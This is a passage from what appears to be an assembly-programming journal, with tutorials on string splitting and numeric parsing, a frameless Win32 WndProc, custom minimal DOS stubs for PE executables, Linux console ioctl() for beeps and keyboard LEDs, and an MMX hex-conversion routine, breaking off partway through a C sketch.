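original buffer holding all the substrings, just as the asm version does.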

To test this, of course, one needs a program to drive it. The following code
simulates an /etc/passwd read, splitting a hard-coded line into its component,
colon-delimited fields:

#----------------------------------------------------------------splittest.asm
BITS 32
GLOBAL main
EXTERN printf
EXTERN free
EXTERN exit
%include 'split.asm'

SECTION .text
main:
    push dword szString        ;print the original string
    push dword szOutput
    call printf
    add esp, 8

    push dword ":"                ;split the original string
    push dword szString
    push dword 0
    call split
    add esp, 12
    test eax, eax                ;did malloc fail inside split?
    jz done
    mov [ptrarray], eax            ;keep the array address for free()

    mov ecx, ebx
    mov ebx, eax
printarray:                        ;print the substrings
    push ecx                    ;printf hoses ecx!!!!!
    push dword [ebx]
    push dword szOutput
    call printf
    add esp, 8
    add ebx, 4                    ;skip to next array element
    pop ecx
    loop printarray

    push dword [ptrarray]        ;free the array created by split
    call free
    add esp, 4

done:
    push dword 0                ;program is done
    call exit

SECTION .data
szOutput    db '%s',0Ah,0                                        ;printf format string
szString    db    'name:password:UID:GID:group:home',0    ;string to split
ptrarray    dd    0                                            ;array returned by split
#------------------------------------------------------------------------EOF

This program was written using nasm on a glibc Linux platform; however the
split routine itself is fairly portable -- the only assumed external routine
is malloc() -- and can easily be rewritten for the DOS or Win32 platforms.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                   String to Numeric Conversion
                                                   by Laura Fairhead


    Here I present you with a library routine that scans a value from
a string and converts it to an integer. It is very useful, not only
when you have to convert string->value but also if you are parsing and
want to recognise a numeric token.

    The routine will scan values in any radix from 2 to 36. Characters
for the digit values from 10-35 are naturally "A"-"Z"/"a"-"z".

    This routine has 2 entry points, 'scanur' and 'scanu'. 'scanur'
is used to set the radix of the scan conversion. Once this value is
set the main routine 'scanu' can be called freely to scan values from
the string.

    The scan routine is called with a string pointer which is updated
on exit to the first invalid character. It will return with the carry
flag set if the value was too big to fit into the return register EAX.
If the carry flag is clear there is no error, and the zero flag then
indicates whether a valid value was actually scanned [ZF=1 means no digits
were found]. This return status convention gives the most flexibility to
the application programmer; if a valid value MUST be scanned they can
detect the condition via:-

    CALL NEAR PTR scanu
    JNA error                ;get out if overflow/no value

    The branch will be taken if CF=1 or ZF=1. Hence, if a value has to be
scanned errors may be picked up with only one test.


=========START OF CODE=====================================================
;
;(current scan radix)
;
scanuradi:
        DB ?

;
;scanur-    set up for scanu routine
;
;entry:        AL=radix
;
;         !! radix must be in range 0<=radix<=36
;
;         !! radix must be set by calling this routine prior to
;         !! using scanu
;
;exit:        (all registers preserved)
;

scanur    PROC NEAR

        MOV BYTE PTR CS:[scanuradi],AL
        RET

scanur    ENDP

;
;scanu-        scan string value returning result
;
;entry:        DS:SI=address of string
;            DF=0
;
;         !! radix must be set previously by calling 'scanur'
;
;exit:        SI=updated to offset of first invalid character
;
;            CF=1
;             a numeric overflow has occurred, ie: the number being scanned
;            has become too big to fit into EAX
;
;            CF=0
;             if ZF=0 then a valid value was scanned, if ZF=1 then no
;            valid digits were scanned
;
;            EAX=converted value
;

scanu    PROC NEAR
;
;preserve registers
;
        PUSH EDX
        PUSH EBX
        PUSH ECX
        PUSH DI
;
;initialise
;  EBX=radix constant
;  EAX=total
;  ECX=0, bits 8-31 of ECX always=0 to pad byte digit to dword
;    DI=holds original offset
;
        XOR EAX,EAX
        XOR EBX,EBX
        XOR ECX,ECX
        MOV DI,SI
        MOV BL,BYTE PTR CS:[scanuradi]
;
;main loop start
; EAX,ECX change roles so that we can use AL for the digit calculation
; saving code length
;
lop:    XCHG EAX,ECX
        LODSB
;
;if "0"-"9" map to 0-9 and skip to radix check
;
        SUB AL,030h
        CMP AL,0Ah
        JC SHORT ko
        ADD AL,030h
;
;map "A"-"Z"/"a"-"z" to 10-35, aborting on the one invalid value (040h)
;that won't get trapped in the next stage
;
        AND AL,0DFh
        SUB AL,037h
        CMP AL,0Ah
        JC SHORT ko2
;
;digit value checked that it is valid for the current radix
;this also weeds out previous invalid values (since they would be >35)
;jump out of loop is delayed so that EAX can be restored for exit
;
ko:        CMP AL,BL
        CMC
ko2:    XCHG EAX,ECX
        JC SHORT erriv
;
;accumulate the digit to the total. the total must be pre-multiplied.
;checks for overflow are done at both points so the routine can never
;generate false results
;
        MUL EBX
        JC errovr
        ADD EAX,ECX
        JNC lop
;
;overflow error
;    adjust SI index to current char and exit, note
;    that CF =1 already
;
errovr: DEC SI
        JMP SHORT don
;
;invalid character
;    main exit point, SI is adjusted to the current char
;    the CMP ensures that CF =0, and also that ZF =1 iff
;    no chars have been read
;
erriv:    DEC SI
        CMP SI,DI
;
;(restore registers and exit)
;
don:    POP DI
        POP ECX
        POP EBX
        POP EDX
        RET

scanu    ENDP

=========END OF CODE=======================================================
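
For readers who prefer to see the logic in a higher-level form, here is a
rough C sketch of what scanu does. The names scan_unsigned and scan_status
are invented for this sketch, the three return codes stand in for the CF/ZF
combinations, the overflow test is done before the multiply rather than
after it, and ASCII is assumed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum scan_status { SCAN_OK, SCAN_NONE, SCAN_OVERFLOW };

/* Sketch of scanu: reads digits of the given radix (2..36) from *sp,
 * stores the value in *out and leaves *sp at the first character that
 * was not consumed. */
enum scan_status scan_unsigned(const char **sp, unsigned radix, uint32_t *out)
{
    const char *s, *start;
    uint32_t total = 0;

    assert(sp != NULL && *sp != NULL && out != NULL);
    assert(radix >= 2 && radix <= 36);
    start = s = *sp;

    for (;; s++) {
        unsigned c = (unsigned char)*s;
        unsigned digit;

        if (c >= '0' && c <= '9')
            digit = c - '0';
        else if (c >= 'A' && c <= 'Z')
            digit = c - 'A' + 10;
        else if (c >= 'a' && c <= 'z')
            digit = c - 'a' + 10;
        else
            break;                      /* not a digit at all */
        if (digit >= radix)
            break;                      /* digit too big for this radix */

        /* total * radix + digit must still fit in 32 bits */
        if (total > (UINT32_MAX - digit) / radix) {
            *sp = s;                    /* like CF=1: stop on this digit */
            return SCAN_OVERFLOW;
        }
        total = total * radix + digit;
    }
    *sp = s;
    *out = total;
    return (s == start) ? SCAN_NONE : SCAN_OK;   /* like ZF=1 / ZF=0 */
}
```

Testing the result against SCAN_OK alone plays the part of the single JNA
in the asm version.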


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                        WndProc, The Dirty Way
                                                        by X-Calibre of Diamond


I assume you all know what a WndProc is, and what you need it for. Let me
give you a quick example of a WndProc:

    WndProc      PROC hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
        .IF uMsg == WM_DESTROY
            INVOKE PostQuitMessage, NULL
        .ELSE
            INVOKE DefWindowProc, hWnd, uMsg, wParam, lParam
            ret
        .ENDIF
            xor      eax, eax
            ret
    WndProc      ENDP

This generates the following code:

    push  ebp                                    ; Create stack frame
    mov      ebp, esp                                ; Why does MASM use 'leave',
                                                ; but not 'enter'?

    cmp      dword ptr [ebp+0C], WM_DESTROY        ; ebp+0C is uMsg
    jne      @@notDestroy

    push  NULL
    Call  PostQuitMessage
    jmp      @@exitFromDestroy

    @@notDestroy:
    push  [ebp+14]                                ; ebp+14 is lParam
    push  [ebp+10]                                ; ebp+10 is wParam
    push  [ebp+0C]                                ; ebp+0C is uMsg
    push  [ebp+08]                                ; ebp+08 is hWnd
    Call  DefWindowProcA                        ; Let Windows handle the other
                                                ; messages

    leave                                        ; Remove stack frame
    ret      0010                                    ; Remove function arguments
                                                ; from stack and return

    @@exitFromDestroy:
    xor      eax, eax                                ; Return 'FALSE'
    leave                                        ; Remove stack frame
    ret      0010                                    ; Remove function arguments
                                                ; from stack and return

Looks nice, and works fine... But, it builds a stack frame, even though we are
not using local variables. And if you code in a good fashion, there almost
never will be any... after all, this procedure is just a message handler, and to
keep your code tidy, you will not put all the code in here, but in separate
procedures, which you will call from here.

There's only one reason left why MASM builds a stack frame for this function:
The function has a prototype for an HLL call. An HLL call uses the stack to
transfer its arguments.

So, all we have to do, is remove the prototype. That's easy: Just don't tell
MASM that this function uses any arguments.
This simple tweak will do the trick:

    WndProc      PROC
        ...
    WndProc      ENDP

The arguments will still be passed to the function, since that part of the
code is in the Windows kernel, and has not changed. Be careful though: Since
MASM does not know that there are arguments on the stack, it no longer cleans
up the stack. You have to specify that yourself.

Now we have a slight problem: How can we access the arguments now?
The answer is surprisingly easy: We create aliases for the addresses relative
to the stack pointer (esp). MASM does the same, except that it uses the base
pointer since it created a stack frame, and saved the original stack pointer
in ebp.
Knowing that Windows HLL calls always push the arguments in reverse order, and
that the return address is stored on the stack as well, we can devise these
indices for our parameters:

    hWnd    EQU       dword ptr [esp][4]
    uMsg    EQU       dword ptr [esp][8]
    wParam    EQU       dword ptr [esp][12]
    lParam    EQU       dword ptr [esp][16]

There, now we can refer to the arguments as usual.
There's 1 drawback however: Since the indices are relative to esp, they are
only valid when esp is not touched. In other words: Don't try to push or pop
anything and then use these arguments again. They can be used if you push some
variables, then pop them again before you access any of these arguments again,
because the stack pointer will be at the correct position again.

Let's say you need to use the stack again (eg. for an INVOKE), so the indices
will be invalidated. You might think that the only option then is to save the
stack pointer again, so we're back to the stack frame...
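It's an option, but not the best one. Namely, ebp is a non-volatile register,
and needs to be saved and restored after use.
But, there are more registers in the CPU. How about using esi for example?
One warning: Win32 only treats eax, ecx and edx as volatile. Windows expects
ebx, esi and edi to survive a callback just like ebp, so to be strictly safe
esi has to be saved on entry and restored before the ret as well; the listings
that follow leave this out to keep the idea visible.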

    WndProc      PROC
        mov      esi, esp
        hWnd    EQU       dword ptr [esi][4]
        uMsg    EQU       dword ptr [esi][8]
        wParam    EQU       dword ptr [esi][12]
        lParam    EQU       dword ptr [esi][16]

        ...
    WndProc      ENDP

And if you leave the stack as you found it (which should always be the case
with decent code), you don't even need to restore esp again.
If you got dirty and the stack still contains variables you don't want
anymore, then this is enough for a clean exit:

    WndProc      PROC
        ...
        mov      esp, esi
        ret      4 * sizeof dword        ; As I mentioned earlier, we have to clean
                                    ; the stack ourselves.
                                    ; We had 4 dword arguments, so this does
                                    ; the trick
    WndProc      ENDP

Still less code, and thus faster than the original. And just as robust. You
have one register less to use during the WndProc, but as I said earlier, there
shouldn't be too much code here, so you should be able to spare the register.

Well, there's just 1 more thing that can be done with this tweaked WndProc.
Namely, if you leave the stack as you found it, the arguments for the
DefWindowProc are already in place, and the return address of our caller is
there too.
So basically we can just jump to it without any further ado. The resulting
WndProc that is equivalent to the original one will look like this then:

    WndProc      PROC
        hWnd    EQU       dword ptr [esp][4]
        uMsg    EQU       dword ptr [esp][8]
        wParam    EQU       dword ptr [esp][12]
        lParam    EQU       dword ptr [esp][16]

        .IF uMsg == WM_DESTROY
            INVOKE PostQuitMessage, NULL
        .ELSE
            jmp     DefWindowProc
        .ENDIF

        xor      eax, eax
        ret      4 * sizeof dword        ; Be sure to clean that stack!
    WndProc      ENDP

Yes, much shorter, and faster. Let's take a look at the generated code to get
a better understanding of how much shorter it actually is:

    cmp      dword ptr [esp+08], WM_DESTROY
    jne      @@noDestroy

    push  NULL
    Call  PostQuitMessage
    jmp      @@exitFromDestroy

    @@noDestroy:
    Jmp      DefWindowProcA

    @@exitFromDestroy:
    xor      eax, eax
    ret      0010

If you code it 'by hand' instead of with the .IF statement, there's another
tweak we can pull, but the rest looks great, doesn't it?

Of course these stunts can be applied to other procedures as well. Be careful,
and use them in good health.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                       Programming the DOS Stub
                                                       by X-Calibre of Diamond


As you may (or may not) know, there is a piece of DOS code still in every
Win32 executable file. This piece of code is referred to as the 'stub' and
ensures that the Win32 program won't cause a crash when run on a DOS system.
It just prints the familiar 'This program cannot be run in DOS mode' message
and exits.

'So what do we care?' you might ask... Well, Microsoft's linker provides the
option to link your own stub instead of the standard one. And, you must have
guessed it already by now: We can do it better than Microsoft!

So, how do we do this then?

Well, actually it's very simple: The first part of the Win32 executable is
literally a DOS file. There's just one small requirement: at offset 3Ch (60)
there is a DWORD specifying the start of the PE block relative to the start of
the file (the offset).
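
To make the role of that DWORD concrete, here is a small C sketch that pulls
the PE offset out of an image already loaded into memory. The function name
pe_block_offset is hypothetical, and the check for the 'MZ' signature at the
start of the DOS header is an extra sanity test not discussed in the text.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PE_OFFSET_FIELD 0x3C    /* where the DWORD lives in the DOS header */

/* Returns the file offset of the PE block, or 0 if the image is too
 * short or does not start with the DOS "MZ" signature. */
uint32_t pe_block_offset(const unsigned char *image, size_t size)
{
    const unsigned char *f;

    assert(image != NULL);
    if (size < PE_OFFSET_FIELD + 4 || image[0] != 'M' || image[1] != 'Z')
        return 0;

    f = image + PE_OFFSET_FIELD;
    /* assemble the little-endian DWORD byte by byte */
    return (uint32_t)f[0] | (uint32_t)f[1] << 8 |
           (uint32_t)f[2] << 16 | (uint32_t)f[3] << 24;
}
```

Reading the field byte by byte keeps the sketch independent of the byte order
and alignment rules of the machine it runs on.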

So basically you can just put any DOS EXE program in there, as long as you
make sure that there is room for the DWORD at offset 3Ch in the file. Usually
this is no problem, since the EXE header itself is usually quite big, and a
lot of the space is not being used. Microsoft's own stub has an empty header
mostly, and the code starts right after the DWORD, at offset 40h.

That's all fine and nice and whatever, but what can we do with this info?
Well, you could link in an entire DOS program for people not using Windows
(Look at REGEDIT.EXE in Windows 9x for an example). You could include a Fire
or Plasma effect when your program is run in DOS. You could create your own
'This program cannot be run in DOS mode' message. But, most importantly:
you can create smaller EXE files! This is one of the nicer applications of
the stub, and the one I'm going to explain a bit here.

What is the smallest size for the stub, theoretically speaking?

Well, considering the fact that at offset 60 there MUST be an offset pointing
to the PE header, the minimum size will be 60 bytes.
The actual stub file has to be 64 bytes, because of restrictions of Microsoft's
linker. But be sure not to use the last 4 bytes, since the linker will put in
the offset there.

Well, so in 60 bytes, you can't really do much. But just printing a small
warning for DOS users and then exiting is just about possible. Microsoft made
their version a little large: 120 bytes. So we can try to do just about the
same in 60 bytes.

We're going to use a little trick here, to get the program as small as 60
bytes. At offset 20h, there is room for a relocation table for the code. But
since we won't be needing one, we're going to put our code in there. This
is perfectly possible, because you can specify how many relocation table items
your program will be using. We just put in a 0 word at offset 6 in the header,
and the table is ours. Technically speaking, the code is still after the table.
The table just has a length of 0 bytes.

For all you non-DOS coders out there, this is what the program looks like:

;====================================================================stub.asm
.Model Tiny

.code
start:
    push cs         ; Point the data segment to the code segment, since
    pop     ds         ; we're putting the data after the code to save space.

    mov     dx, offset message ; Load pointer to the string for the call.
    mov     ah, 9                ; 9 is the print argument for int 21h.
    int     21h                ; The DOS interrupt.

    mov     ah, 4Ch            ; 4C is the exit argument for int 21h
    int     21h

; Put our string here
message db        "Windows prg!",0Dh,0Ah,'$'

; A little explanation may be required:
;
; 0Dh is the 'Carriage return' ASCII code.
; 0Ah is the 'Line feed' ASCII code.
; '$' is the string-terminator in DOS (like 0 is in Windows and other C based
; OSes)
end start
;=========================================================================EOF

The message can be 15 bytes at most, including the string terminator, since
the program itself starts at offset 32 in the file, and is 13 bytes long.
(32+13+15 = 60 bytes, so the message ends at offset 59 and the next byte will
be used for the PE offset DWORD).

This version yields an undefined error code on exit. The error code is
specified in al when you call the exit DOS function. The error code actually
depends on the output in al of the int 21h call that prints the string. This
is of course undefined (actually it is 24h in Windows 98).

Microsoft's stub has a defined error code of 1. If you want to make your stub
100% the same, then you must replace the 'mov ah, 4Ch' with 'mov ax, 4C01h'.
Mind you, this code is 1 byte longer, so your message can then be only 14
bytes long in total.

Since I'm never going to use the errorcode, I decided to save the byte and use
a larger string.

And that's that. Now you may run into trouble with the linker. I couldn't find
a linker that kept the EXE header to its minimum (which is 32 bytes). I used
TLINK, which made a 512 byte header. So I just edited the file manually, and
got it to its minimum size. A document explaining the EXE header format is
enclosed, and so is the STUB.EXE I made, and a small Win32 application using
it (with relocated PE header at 40h).
I will just briefly describe how the filesize is stored in the header, since
the document is not particularly clear there.

offset  length  description                          comments
----------------------------------------------------------------------
2       word    length of last used sector in file   modulo 512
4       word    size of file, incl. header           in 512-pages

The '512-pages' at offset 4 are (floppy) disk sectors. They are 512 bytes
each. So to calculate how many sectors your file will occupy, this formula
will suffice:

    sectors = CEILING(filesize/512)

CEILING means to round up to the next whole number, unless the result is
already whole.

The length of the last used sector at offset 2 stores how many bytes are
occupied in the last sector of the file. Like the comment says, it's filesize
modulo 512.
In other words:

    lastusedsector = filesize - FLOOR(filesize/512)*512

The other way around is of course like this:

    filesize = (sectors - 1)*512 + lastusedsector

(If lastusedsector is 0, the last sector is completely full and the filesize
is simply sectors*512.)
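
The two conversions can be sketched in C as follows. The struct and function
names are invented for this example; the special case for a last-sector value
of 0 (a file that fills its last sector exactly) follows from the modulo and
is handled explicitly.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE 512u

struct mz_size {
    uint16_t last_page_bytes;   /* word at header offset 2 */
    uint16_t pages;             /* word at header offset 4 */
};

/* file size -> the two header words */
struct mz_size mz_size_encode(uint32_t filesize)
{
    struct mz_size s;

    assert(filesize <= 65535u * PAGE);      /* page count must fit a word */
    s.pages = (uint16_t)((filesize + PAGE - 1) / PAGE);    /* CEILING */
    s.last_page_bytes = (uint16_t)(filesize % PAGE);       /* modulo 512 */
    return s;
}

/* the two header words -> file size */
uint32_t mz_size_decode(struct mz_size s)
{
    if (s.pages == 0)
        return 0;
    if (s.last_page_bytes == 0)             /* 0: the last page is full */
        return (uint32_t)s.pages * PAGE;
    return (uint32_t)(s.pages - 1) * PAGE + s.last_page_bytes;
}
```

For a 64-byte stub, mz_size_encode(64) gives one page with 64 bytes used in
it, which are the values to patch into offsets 4 and 2 of the header.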

A little note here: Look at these 2 values in a program with the standard
Microsoft stub (eg. NOTEPAD.EXE).
We find these 2 values:

offset 2: 0090h
offset 4: 0003h

So the filesize is: (3 - 1)*512 + 144 = 1168

Now wait just a second! At offset 3Ch we find 00000080h...
So at offset 128 we find the PE header and the Windows program. Then how can
the DOS stub be 1168 bytes?

It can't!! Microsoft goofed up here... They have probably hand-edited the
EXE file they used for the stub like I did, and forgot to edit these values.
Luckily for them, this bug does no harm. But still...

Well, after we have created our DOS stub, all we have to do is link it in.
With Microsoft's linker it goes like this:

LINK code.obj /SUBSYSTEM:WINDOWS /STUB:STUB.EXE

And that's all you need!
You can ignore the warning the linker gives about the incomplete header. We
know that the program runs. The linker just doesn't consider EXE headers with
no relocation table (which could actually be considered a bug, since our EXE
header specifies that the table has length 0, and therefore the code can start
at offset 20h. The DOS EXE loader does interpret it correctly, so in fact, the
linker could be considered incompatible).

The only problem with Microsoft's linker is that it doesn't seem to want to
link the PE block right after the DOS stub. Maybe other linkers do, but I
haven't found one that does yet. Microsoft's linker just dumps some garbage,
and then puts its PE block at offset 78h. Maybe that is because their stub is
78h bytes long and they don't consider shorter stubs?
The offset at which the PE block is linked depends on the initial SP value
specified at offset 10h, actually (why is that?). It can also link at offset
80h or 88h.
You could move the PE block to offset 40h, and pad with 0's after the PE block,
using a hex-editor. This way it will compress even better, maybe. And you
could perhaps edit the PE block and move the code forward a bit too (there's a
great util in this. Shall we make it?).

Well, anyway... Have fun, and get crazy with your custom DOS stubs!

And remember:

DOS Knowledge is power!


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                                  Using ioctl()
                                                                  by mammon_


One of the most famous Unix maxims reads 'everything is a file'; directories
are files, pipes are files, hardware devices are files, even files are files.
This provides a transparent means of reading and writing hardware or software
constructs such as modems and sockets; yet the lack of interrupts or device
driver routines is sometimes confusing for those not used to Unix programming.
In Linux, device parameters are controlled through the character and block
'special file' interface by calling ioctl().

The ioctl() system call takes a file descriptor and a request type as its
primary arguments, along with an optional third argument referred to as "argp"
which contains any arguments that must be passed along with the request. The
possible ioctl() requests can be found by poking around in the $INCLUDE/asm and
$INCLUDE/linux header files, although a somewhat dated list of requests can be
viewed by typing 'man ioctl_list'.

One of the most useful devices to program with ioctl() for the applications
programmer will be the console; in Linux terms, this consists of the keyboard
and display, such that all 63 of the Virtual Consoles can be controlled with
ioctl(). This can be useful if one wants to output debugging information to a
non-visible console, or to transfer STDIN and STDOUT to a newly-allocated
console while disabling virtual console switching, effectively tying the user
to a single console [e.g., in a walkup workstation].

Information on console ioctl requests can be found with 'man console_ioctl'.
Bringing up this man page instantly displays the following text:
       WARNING: If you use the following information you are
       going to burn yourself.

       WARNING: ioctl's are undocumented Linux internals, liable
       to be changed without warning.  Use POSIX functions.
This is ancient asm coderspeak meaning 'you are on the right track, keep going.'

Perusing the listed requests will provide enough information to code that first
exercise from DOS-ASM 1o1: generating a tone on the PC speaker.
       KDMKTONE
       Generate tone of specified length.  The lower 16
       bits of argp specify the period in clock cycles,
       and the upper 16 bits give the duration in msec.
       If the duration is zero, the sound is turned off.
       Control returns immediately.  For example, argp =
       (125<<16) + 0x637 would specify the beep normally
       associated with a ctrl-G.  (Thus since 0.99pl1;
       broken in 2.1.49-50.)

This should not be too terribly hard to implement -- a call to open the file
descriptor, and a single call to ioctl() to sound the tone. First things first,
open() is called on /dev/tty to create a handle for the current console:
#-------------------------------------------------------------------beep.asm
%define O_RDWR 2                    ;grep O_RDWR /usr/include/asm/*
%define KDMKTONE 0x4B30            ;grep KDMKTONE /usr/include/linux/*
EXTERN open
GLOBAL main

section .data
szTTY db '/dev/tty',0

section .text
main:
          push dword O_RDWR
          push dword szTTY
          call open
          add esp, 8
#--------------------------------------------------------------------BREAK

Next, pack the duration and period of the tone to be played into EDX:
#---------------------------------------------------------------------CONT
          mov dx, 666            ;duration in msec
          shl edx, 16            ;move it into the upper 16 bits
          or dx, 1199            ;period in clock cycles (sets the pitch)
#--------------------------------------------------------------------BREAK
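
The same packing can be written down in C, which is handy for working out
other tones before hard-coding them. This is only a sketch: kdmktone_arg() and
tone_period() are hypothetical helper names, and tone_period() assumes that
the 'clock cycles' of the man page are those of the PC timer chip running at
1193180 Hz.

```c
#include <assert.h>
#include <stdint.h>

#define PIT_HZ 1193180u   /* assumed clock behind the "period in clock cycles" */

/* Pack a KDMKTONE argument: period in the low 16 bits, msec in the high 16. */
uint32_t kdmktone_arg(uint16_t period, uint16_t msec)
{
    return ((uint32_t)msec << 16) | period;
}

/* Period, in clock cycles, for a tone of roughly 'hz' Hertz. */
uint16_t tone_period(uint32_t hz)
{
    assert(hz >= 19);     /* lower frequencies give a period over 16 bits */
    return (uint16_t)(PIT_HZ / hz);
}
```

kdmktone_arg(1199, 666) yields 0x029A04AF, the value the assembly above leaves
in EDX. Under the stated assumption, a period of 1199 works out to a tone of
roughly 995 Hz.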

Now, normally one might call the libc ioctl() wrapper like so (this needs an
'EXTERN ioctl' next to the 'EXTERN open'):
          push edx
          push dword KDMKTONE
          push eax
          call ioctl
          add esp, 12

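However, ioctl is a system call, and we can save a bit of time by going
straight through the syscall gate at int 0x80. The call number goes in EAX and
the arguments in EBX, ECX and EDX, which is where the tone already sits:
#---------------------------------------------------------------------CONT
          mov ebx, eax               ;arg 1: file descriptor returned by open
          mov ecx, KDMKTONE          ;arg 2: request
                                     ;arg 3: EDX, packed above
          mov eax, 54                ;ioctl, see /usr/include/asm/unistd.h
          int 0x80
          ret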
#----------------------------------------------------------------------EOF

So much for the simple beep. Another ASM 101 favorite is the 'blinking LED'
trick, where students learn to make the keyboard LEDs blink on and off in any
number of psychedelic patterns. A quick tour through the man page shows the
requests needed for this sample as well:

       KDGETLED
       Get state of LEDs.  argp points to a long int.  The
       lower three bits of *argp are set to the state of
       the LEDs, as follows:
           LED_CAP         0x04    caps lock led
           LED_NUM         0x02    num lock led
           LED_SCR         0x01    scroll lock led
       KDSETLED
       Set the LEDs.  The LEDs are set to correspond to
       the lower three bits of argp.  However, if a higher
       order bit is set, the LEDs revert to normal:
       displaying the state of the keyboard functions of caps
       lock, num lock, and scroll lock.

The file descriptor must be opened as with the previous example. From there,
we must get the current LED state:
#--------------------------------------------------------------------led.asm

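%define KDGETLED        0x4B31           ;grep KDGETLED /usr/include/linux/*
%define KDSETLED        0x4B32           ;grep KDSETLED /usr/include/linux/*

section .bss
ledstate  resd 1                         ;KDGETLED stores the LED state here

section .text
          mov ebx, eax                   ;file descriptor from open()
          mov edx, ledstate              ;argp must point to a buffer, not be 0
          mov ecx, KDGETLED
          mov eax, 54
          int 0x80
          mov edx, [ledstate]            ;EDX = current LED bits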
#--------------------------------------------------------------------BREAK

Next, all of the LEDs will be turned on and then off 10 times. It is vital
to the success of the algorithm that a delay be present between the off and
on transitions; otherwise the LEDs will appear to be steadily lit, and that
is much less of a programming achievement:
#---------------------------------------------------------------------CONT
          mov ecx, 10
.here:
          push ecx                    ;save counter
          or edx, 0x07                ;set all of 'em
          mov ecx, KDSETLED
          mov eax, 54
          int 0x80

          mov ecx, 0xFFFFFF            ;delay counter
.delay:
          loop .delay

          and edx, 0                ;turn all of them off
          mov ecx, KDSETLED
          mov eax, 54
          int 0x80

          mov ecx, 0xFFFFFF            ;next delay counter
.delay2:
          loop .delay2

          pop ecx
          loop .here

          mov edx, 0xFF               ;a higher bit set: LEDs revert to normal
          mov ecx, KDSETLED
          mov eax, 54
          int 0x80
          ret
#----------------------------------------------------------------------EOF
Blinking the LEDs in succession and achieving hypnotic frequency via ioctl()
will be left as an exercise to the reader.
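
As a nudge in that direction, here is a hedged C sketch of the 'in succession'
part. The helper names are invented for this example, the Num, Caps, Scroll
order is an assumption about how the LEDs sit on the keyboard, and the delay
between steps is left to the caller.

```c
#include <assert.h>
#include <sys/ioctl.h>

#ifndef KDSETLED
#define KDSETLED 0x4B32     /* same value as in led.asm */
#endif
#define LED_SCR  0x01
#define LED_NUM  0x02
#define LED_CAP  0x04

/* LED mask for step n of the chase: exactly one LED lit at a time. */
unsigned led_chase(unsigned step)
{
    /* assumed physical order, left to right */
    static const unsigned order[3] = { LED_NUM, LED_CAP, LED_SCR };
    return order[step % 3];
}

/* Light the LEDs in 'mask' on console 'fd'; returns what ioctl() returns. */
int led_set(int fd, unsigned mask)
{
    assert((mask & ~0x07u) == 0);   /* a higher bit would release the LEDs */
    return ioctl(fd, KDSETLED, (unsigned long)mask);
}
```

Calling led_set(fd, led_chase(n)) for n = 0, 1, 2 and so on, with a pause after
each call, walks a single lit LED across the keyboard.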

This should provide a quick introduction to using ioctl(). There are many more
possibilities available for scan codes, screen painting, and virtual console
control; further opportunities for console amusement exist also within the realm
of escape-sequence programming. The examples presented here can be compiled with
the standard
    nasm -f elf file.asm
    gcc -o file file.o
combination, or by using a Makefile:
#----------------------------------------------------------------------Makefile
# Comments sit on their own lines: make keeps any spaces between a value
# and a trailing '#' as part of the variable.

# Base filename, assembler, source file and object file
TARGET = beep
ASM = nasm
ASMFILE = $(TARGET).asm
OBJFILE = $(TARGET).o

# Linker, library flags and library location flags
LINKER = gcc
LIBS =
LIBDIR =

# 'all' is the first target, so a plain 'make' builds it.
# Each command line below must begin with a tab character.
all:
	$(ASM) -o $(OBJFILE) -f elf $(ASMFILE)
	$(LINKER) -o $(TARGET) $(OBJFILE) $(LIBDIR) $(LIBS)
#---------------------------------------------------------------------------EOF
With TARGET set to the base name of the source file, typing 'make' in the
directory where the Makefile is located will assemble and link the program.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
                                                           BinToString
                                                           by Cecchinel Stephan


;Summary:       Converts a 32 bit number to an 8-byte hex string.
;Compatibility: MMX+
;Notes:         14 cycles. Input is stored in EAX; the output is 8 lowercase
;               hex digits, without a terminating zero, written to [EDI].
;               Execute EMMS before any FPU code that follows.
Sum1:      dd    0x30303030, 0x30303030
Mask1:      dd    0x0f0f0f0f, 0x0f0f0f0f
Comp1:      dd    0x09090909, 0x09090909
Hex32:
        bswap    eax
        movq    mm3,[Sum1]
        movq    mm4,[Comp1]
        movq    mm2,[Mask1]
        movq    mm5,mm3
        psubb    mm5,mm4
        movd    mm0,eax
        movq    mm1,mm0
        psrlq    mm0,4
        pand    mm0,mm2
        pand    mm1,mm2
        punpcklbw mm0,mm1
        movq    mm1,mm0
        pcmpgtb mm0,mm4
        pand    mm0,mm5
        paddb    mm1,mm3
        paddb    mm1,mm0
        movq    [edi],mm1
        ret
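
For readers without an MMX assembler at hand, the routine can be modelled in
portable C. This is a sketch of the same arithmetic, not a translation of the
instructions: hex32_model() is a hypothetical name, the nibbles are spread out
with a plain loop, and the greater-than-9 test that PCMPGTB performs is
replaced by an add-and-shift trick on a 64-bit integer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Writes the 8 lowercase hex digits of 'value' to out[0..7], most
   significant digit first, with no terminating zero. */
void hex32_model(uint32_t value, char out[8])
{
    const uint64_t ones = 0x0101010101010101ULL;
    uint64_t nib = 0, gt9, ascii;
    int i;

    assert(out != NULL);

    /* One nibble per byte, most significant nibble in the lowest byte
       (the job done by BSWAP, PSRLQ, PAND and PUNPCKLBW). */
    for (i = 0; i < 8; i++)
        nib |= (uint64_t)((value >> (28 - 4 * i)) & 0x0f) << (8 * i);

    /* 1 in every byte whose nibble is above 9: nibble + 6 reaches 16. */
    gt9 = ((nib + 6 * ones) >> 4) & ones;

    /* '0' + nibble, plus 0x27 for a..f: 0x30 + 10 + 0x27 = 0x61 = 'a'. */
    ascii = nib + 0x30 * ones + 0x27 * gt9;

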